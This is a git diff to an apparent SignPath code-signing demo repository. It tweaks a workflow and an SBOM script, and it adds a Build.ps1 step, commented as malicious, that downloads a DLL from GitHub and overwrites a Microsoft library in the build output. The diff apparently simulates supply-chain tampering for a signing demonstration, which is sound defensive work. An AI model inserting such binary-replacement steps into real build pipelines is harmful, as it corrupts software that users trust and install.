diff --git a/.github/workflows/build-and-sign.yml b/.github/workflows/build-and-sign.yml index 4bf2185..cbea593 100644 --- a/.github/workflows/build-and-sign.yml +++ b/.github/workflows/build-and-sign.yml @@ -5,8 +5,6 @@ run-name: Demo workflow signing with SignPath on: push: pull_request: - #schedule: - # - cron: '30 3 * * *' # every day at 3:30am UTC workflow_dispatch: # Allows you to run this workflow manually from the Actions tab jobs: diff --git a/sbom/Create-SBOM.ps1 b/sbom/Create-SBOM.ps1 index 5632ace..4af6e99 100644 --- a/sbom/Create-SBOM.ps1 +++ b/sbom/Create-SBOM.ps1 @@ -24,7 +24,7 @@ dotnet tool install cyclonedx --tool-path $tempPath # 2.b create nuget bom $cyclonDxToolPath = Join-Path $tempPath "dotnet-CycloneDX.exe" -& "${cyclonDxToolPath}" --output "${tempPath}" -f "nuget.bom.xml" --exclude-dev src\DemoExample.csproj +& "${cyclonDxToolPath}" --output "${tempPath}" --filename "nuget.bom.xml" --exclude-dev src\DemoExample.csproj # 3 Create NPM SBOM $packageJsonPath = Join-Path $PSScriptRoot ".." "src" "package.json" @@ -52,4 +52,4 @@ if (-Not (Test-Path $cycloneDxCliToolPath)) { # 4.b merge both SBOMs into a final one $nugetBomPath = Join-Path $tempPath "nuget.bom.xml" $finalBomPath = Join-Path $PSScriptRoot ".." "_BuildResult-unsigned" "bom.xml" -& "${cycloneDxCliToolPath}" merge --input-files "${npmBomPath}" "${nugetBomPath}" --output-format "xml" --output-file "${finalBomPath}" --group "com.SignPath.demos" --name "SignPath Demo Application" --version "1.0.0" \ No newline at end of file +& "${cycloneDxCliToolPath}" merge --input-files "${npmBomPath}" "${nugetBomPath}" --output-format "xml" --output-file "${finalBomPath}" --group "com.SignPath.demos" --name "SignPath Demo Application" --version "1.0.0" diff --git a/src/Build.ps1 b/src/Build.ps1 index 3614b9a..8dfcaa8 100644 --- a/src/Build.ps1 +++ b/src/Build.ps1 @@ -1,6 +1,10 @@ # build .Net application dotnet build --configuration Release src/DemoExample.csproj +# maliciously replace the Microsoft DLL +Invoke-WebRequest https://github.com/carterjones/hello-world-dll/releases/download/v1.0.0/hello-world-x64.dll ` + -OutFile .\src\bin\Release\net7.0\Microsoft.Extensions.DependencyModel.dll + # build MSI installer Copy-Item .\src\installer\description.wxs .\src\bin\Release\net7.0\description.wxs -Force Push-Location .\src\bin\Release\net7.0